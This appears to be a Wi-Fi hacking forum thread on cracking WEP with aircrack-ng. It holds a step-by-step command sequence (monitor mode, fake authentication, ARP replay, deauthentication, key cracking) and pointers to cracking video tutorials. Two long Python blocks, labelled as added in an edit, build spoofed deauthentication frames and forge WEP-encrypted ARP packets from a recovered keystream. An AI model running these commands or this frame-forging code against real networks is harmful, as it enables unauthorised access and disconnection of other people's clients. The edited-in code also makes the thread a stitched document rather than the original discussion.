
Thread: Just Another WEP Cracking Problem :)


  1. #1
    Just burned his ISO
    Join Date
    Apr 2007
    Posts
    6

    Just Another WEP Cracking Problem :)

    Hi all,
    I really didn't want to post in this forum, but I'm sorry, I had no other choice.
    I'll try my best to provide you all the information so it's easier for you to give a suggestion.

    Hardware In-Use
    Machine: Compaq Evo N800
    Wireless Card: WG511T
    Router: WGR614v6

    Method of Attack
    Quote Originally Posted by BlayzeX
    I open up 4 windows

    In window 1
    1) airmon-ng stop ath0
    2) airmon-ng start wifi0 <--restarts ath0 in monitor mode-->
    3) airodump-ng -c <channel> -w <file> ath0

    In window 2
    1) aireplay-ng -1 30 -e <AP Name> -a <Router Mac> -h <Fake mac> ath0

    In window 3 <--make sure that the fake mac you use is listed on window 1 with the router-->
    1) aireplay-ng -3 -b <Router Mac> -h <Fake mac> -x 900 ath0

    In window 4
    1) aireplay-ng -0 10 -a <Router Mac> -h <Fake Mac> ath0 <--you may have to use this command a couple of times to deauth the mac, but usually it works-->

    once you see your data packets increasing then just wait, you don't need to use the deauth command again... now once you have the amount you think is enough you can use this command in this (window 4) same window

    2) aircrack-ng -x -0 <FILE> <--this is the file you named above, realize it will add a -01 to the name. Example. In Window 1 you chose the file name to be CAPTURE, then here you would use CAPTURE-01.CAP or... just use CAPTURE*.CAP --->
    failed authentication?
    • In window 1, Everything works great.
    • In window 2, Aireplay starts and after a while displays the happy sign [:-)] with a successful authentication message and sends Keep-Alive packets. But it doesn't last too long. I mean it would go on for about a minute or two and then just stop, giving me a variety of reasons for its failure, but when I try again it gives me the happy sign. Now I assume this is a failed authentication, as it should have continued sending keep-alive packets.


    What's odd is the fact that I have no MAC filtering set on my router and yet I can't successfully authenticate. Any ideas what could possibly be the reason? or should I just try a completely different method?

  2. #2
    Senior Member PrairieFire's Avatar
    Join Date
    Apr 2007
    Posts
    705


    What does the Aircrack-ng Documentation say?

  3. #3
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    2 things come to mind...

    1.
    Go to the tutorial section, I have 2 varieties of WEP cracking methods to choose from. Follow them to a T and you won't fail.

    2. Are you doing clientless attack or client deauth attack?? Cause from above..." In window 4
    1) aireplay-ng -0 10 -a <Router Mac> -h <Fake Mac> ath0 <--you may have to use this command a couple of times to deauth the mac, but usually it works-->

    That suggests you're deauthing a client with the -0 option, yet..it says -h <Fake MAC>...you don't use a faked MAC address here..you use the connected client's MAC address here and the option is not -h...it's -c so it would look like this...

    aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

    Follow a real tutorial...see my video in the tutorial section for clientless attacks.
    --=Xploitz=-- ®
    Remote-Exploit.orgs Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial" - http://forums.remote-exploit.org/showthread.php?t=9063
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial" - http://forums.remote-exploit.org/showthread.php?t=7872
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial" - http://forums.remote-exploit.org/showthread.php?t=8230
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases" - http://forums.remote-exploit.org/showthread.php?t=8041
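To make the -a / -c distinction concrete: aireplay-ng -0 puts the BSSID from -a into the transmitter and BSSID address fields of an 802.11 deauthentication frame and the client from -c into the receiver field (with no -c, the aircrack-ng documentation says it sends to the broadcast address). The example below is added for this edit and is not code from the thread or from aircrack-ng; it builds and parses such a frame from raw bytes (no scapy) and shows which associated stations a given frame would actually knock off. The BSSID and client MAC are the ones in the command above; the "fake" MAC and the station set are constructed for the demo.

```python
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_bytes(mac: str) -> bytes:
    """Parse aa:bb:cc:dd:ee:ff (any case) into 6 raw bytes."""
    parts = mac.lower().split(":")
    if len(parts) != 6 or any(len(p) != 2 for p in parts):
        raise ValueError(f"bad MAC address: {mac!r}")
    return bytes(int(p, 16) for p in parts)


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(bssid: str, station: str = BROADCAST, reason: int = 7, seq: int = 0) -> bytes:
    """802.11 deauthentication frame spoofed as if the AP sent it.

    Address 1 (receiver) is the station being kicked (aireplay-ng -c),
    addresses 2 and 3 (transmitter, BSSID) are the AP (aireplay-ng -a).
    Reason 7 = class 3 frame received from a nonassociated station.
    """
    frame_control = struct.pack("<H", 0x00C0)   # type 0 (mgmt), subtype 12 (deauth)
    duration = struct.pack("<H", 0)
    seq_ctrl = struct.pack("<H", (seq & 0x0FFF) << 4)  # sequence number, fragment 0
    body = struct.pack("<H", reason)
    return (frame_control + duration
            + mac_to_bytes(station) + mac_to_bytes(bssid) + mac_to_bytes(bssid)
            + seq_ctrl + body)


def parse_deauth(frame: bytes) -> dict:
    """Inverse of build_deauth; refuses anything that is not a deauth frame."""
    frame_control = struct.unpack_from("<H", frame, 0)[0]
    if (frame_control & 0x00FC) != 0x00C0:
        raise ValueError("not a deauthentication frame")
    return {
        "receiver": bytes_to_mac(frame[4:10]),
        "transmitter": bytes_to_mac(frame[10:16]),
        "bssid": bytes_to_mac(frame[16:22]),
        "reason": struct.unpack_from("<H", frame, 24)[0],
    }


def stations_hit(frame: bytes, associated: set) -> set:
    """Which of the AP's currently associated stations this frame would deauthenticate."""
    info = parse_deauth(frame)
    if info["receiver"] == BROADCAST:
        return set(associated)
    return {info["receiver"]} & set(associated)


def demo() -> dict:
    bssid = "00:14:6c:7e:40:80"        # the -a value from the command above
    real_client = "00:0f:b5:34:30:30"  # the -c value from the command above
    fake_mac = "00:11:22:33:44:55"     # constructed: the attacker's own fake-auth MAC
    associated = {real_client, fake_mac}
    return {
        # -c <real client>: only the real client is kicked and will re-send ARP
        "targeted": stations_hit(build_deauth(bssid, real_client), associated),
        # -c <your fake MAC>: you only tear down your own fake-auth session
        "self": stations_hit(build_deauth(bssid, fake_mac), associated),
        # no -c at all: broadcast, everybody including you
        "broadcast": stations_hit(build_deauth(bssid), associated),
    }


if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name:10s} -> {sorted(hit)}")
```

The "self" case is why a deauth aimed at your own fake MAC gains nothing: the only station it reaches is the one you just fake-authenticated, and there is no real client behind it to re-ARP.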

  4. #4
    Member
    Join Date
    May 2007
    Posts
    138


    He's deauthing himself isn't he?!!!

    He says he's only using one computer, and one wireless card, so presumably he is...coupled with the fact that he's deauthing his Fake MAC of course.

    I like the listing about the router model though, it inspires confidence that he's legitimate anyway...if only everyone did that we'd have a clearer idea about those with illegal intentions.

    Sorry to talk about you, rather than to you, efrancesco...follow Xploitz's videos and you'll be fine

  5. #5
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    Quote Originally Posted by TrialAndError View Post
    He's deauthing himself isn't he?!!!

    He says he's only using one computer, and one wireless card, so presumably he is...coupled with the fact that he's deauthing his Fake MAC of course.

    ...follow Xploitz's videos and you'll be fine
    Sounds like he is deauthing himself...which is pointless in a clientless attack. If you deauth yourself using the -0 option... it's defeating the purpose of a clientless attack..lol But if he's deauthing another client that's already established a connection..then the -0 option is MANDATORY. Sounds like he's trying to do a clientless attack, but he's following a client-connected tutorial and mixing up the attack methods...lol

  6. #6
    Member
    Join Date
    May 2007
    Posts
    138


    efrancesco: As I'm reasonably sure you are acting legitimately may I suggest that you follow this video tutorial by Xploitz:
    http://forums.remote-exploit.org/showthread.php?t=7872
    And feel free to ask any questions you need about how to achieve it here.

    It's slightly different from the method you have been using, but if you follow it closely then you should be successful.

  7. #7
    Just burned his ISO
    Join Date
    Apr 2007
    Posts
    6


    PrairieFire, thanks for pointing out the resource. Actually it's through the aircrack-ng documentation that I was able to determine that it's indeed a failed authentication problem, but they didn't offer any help on how to resolve the issue. I tried the tcpdump method; it sort of solved it, but it wasn't too long before it returned.

    --=Xploitz=--, Man I've been reading so many post that you have made on this forum but its really the first time I get to say thanks for helping me out here and, indirectly, with all other problems I never posted

    TrialAndError, Thanks man that video got me through
    I couldn't find the links to the other video on WEP cracking from Xploitz; I did however get the WPA one. Is that video still available?

    Now, if I may give you this last bit of trouble, I have a good idea of the Fake Deauth and KoreK methods, thanks largely to the paper written by Fluhrer, Mantin and Shamir on cracking WEP, but I'm still not sure about the clientless attack. Any good resources out there that you can point me to? And, finally, is there like a website or something that keeps track of all the WEP/WPA cracking techniques, or is it just scattered all over the internet?


    Once again thanks to all of you!!!

  8. #8
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

  9. #9
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988


    I can upload the bundle on my FTP if you want,

    a big AIO file

    or all files, as you want.... but no online playing available, only download.

  10. #10
    Member
    Join Date
    May 2007
    Posts
    138


    Quote Originally Posted by efrancesco View Post
    TrialAndError, Thanks man that video got me through
    Thank Xploitz, he made it!
    Quote Originally Posted by efrancesco View Post
    I'm still not sure about the clientless attack. Any good resources out there that you can point me to?
    Xploitz's videos will give you all the info you'll need; for a clientless attack check out Video #2...the ChopChop attack will give you the keystream you need to forge an ARP packet, then send that to the AP to generate IVs to use in Aircrack.
    Quote Originally Posted by efrancesco View Post
    finally, is there like a website or something that keeps track of all the wep/wpa cracking techniques or is it just scrambled all over the internet?
    You're looking at it! It's a bit ad hoc, but using the search function and the odd keyword will help you find everything you need. I prefer to use Google to search these forums as it usually gives better results than the actual forum search. Just stick "KEYWORD site:http://forums.remote-exploit.org/" into Google and it'll focus its search solely on these forums.
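The reason a recovered keystream is enough to forge an ARP packet, shown in code. This example is added for this edit; it is not from the thread, from Xploitz's videos, or from aircrack-ng (packetforge-ng does the real thing). WEP frames are IV || RC4(IV || key, plaintext || CRC-32 ICV) and nothing stops an IV from being reused, so once chopchop has told you the plaintext of one captured frame you XOR it off the ciphertext to get that IV's keystream and can encrypt any payload up to that length without ever knowing the key. The chopchop step itself (using the AP as an ICV oracle byte by byte) is not implemented here; the captured frame's plaintext is simply assumed recovered. The 40-bit key, IV, MACs and IPs are constructed lab values.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA) XORed over data; WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """IV (3 bytes, sent in clear) || RC4(IV||key, plaintext || ICV)."""
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    """What the AP does on receipt: decrypt, check ICV. Returns None if the ICV fails."""
    iv, body = frame[:3], frame[3:]
    dec = rc4(iv + key, body)
    plaintext, tag = dec[:-4], dec[-4:]
    return plaintext if icv(plaintext) == tag else None


def recover_keystream(frame: bytes, known_plaintext: bytes):
    """Attacker side, no key: keystream = ciphertext XOR (plaintext || ICV)."""
    iv, body = frame[:3], frame[3:]
    clear = known_plaintext + icv(known_plaintext)
    return iv, bytes(c ^ p for c, p in zip(body, clear))


def forge(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    """Encrypt an arbitrary payload under a recovered keystream, reusing its IV."""
    clear = new_plaintext + icv(new_plaintext)
    if len(clear) > len(keystream):
        raise ValueError("payload longer than the recovered keystream")
    return iv + bytes(c ^ k for c, k in zip(clear, keystream))


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP header + ARP request, as carried in an 802.11 data frame (36 bytes)."""
    llc_snap = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)  # ethernet, IPv4, op=request
    return llc_snap + arp + sender_mac + sender_ip + b"\x00" * 6 + target_ip


def flip_byte(frame: bytes, index: int) -> bytes:
    """Blindly flip one ciphertext bit: the ICV catches this, unlike a keystream forgery."""
    return frame[:index] + bytes([frame[index] ^ 0x01]) + frame[index + 1:]


AP_KEY = bytes.fromhex("1f2e3d4c5b")  # constructed WEP-40 key; only the "AP" knows it


def demo() -> dict:
    # 1. A real client's ARP request as the AP encrypted it and we captured it.
    client_mac = bytes.fromhex("000fb5343030")
    victim_pt = arp_request(client_mac, b"\xc0\xa8\x01\x0a", b"\xc0\xa8\x01\x01")
    captured = wep_encrypt(AP_KEY, b"\x0b\x0c\x0d", victim_pt)
    # 2. Assume chopchop has recovered victim_pt; derive this IV's keystream.
    iv, keystream = recover_keystream(captured, victim_pt)
    # 3. Forge a fresh ARP request from our own (fake-auth) MAC under that keystream.
    fake_mac = bytes.fromhex("00112233aabb")
    forged_pt = arp_request(fake_mac, b"\xc0\xa8\x01\xfe", b"\xc0\xa8\x01\x01")
    forged = forge(iv, keystream, forged_pt)
    # 4. The AP decrypts with the real key: ICV verifies, so it answers, and each
    #    answer is a fresh IV for aircrack-ng.
    decrypted = wep_decrypt(AP_KEY, forged)
    return {
        "ap_accepts_forged": decrypted == forged_pt,
        "decrypted": decrypted,
        "forged_plaintext": forged_pt,
        "keystream_len": len(keystream),
        "ap_accepts_bitflip": wep_decrypt(AP_KEY, flip_byte(captured, 5)) is not None,
    }


if __name__ == "__main__":
    result = demo()
    print("AP accepts forged ARP:", result["ap_accepts_forged"])
    print("AP accepts blind bit-flip:", result["ap_accepts_bitflip"])
```

Two things worth noticing: the recovered keystream is exactly as long as the captured frame body, which is why a short ARP frame is the usual target (you can only forge payloads up to that length), and the AP's only defence, the CRC-32 ICV, rejects a blind bit-flip but is computed over your forged plaintext just like any other, so the forgery passes.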
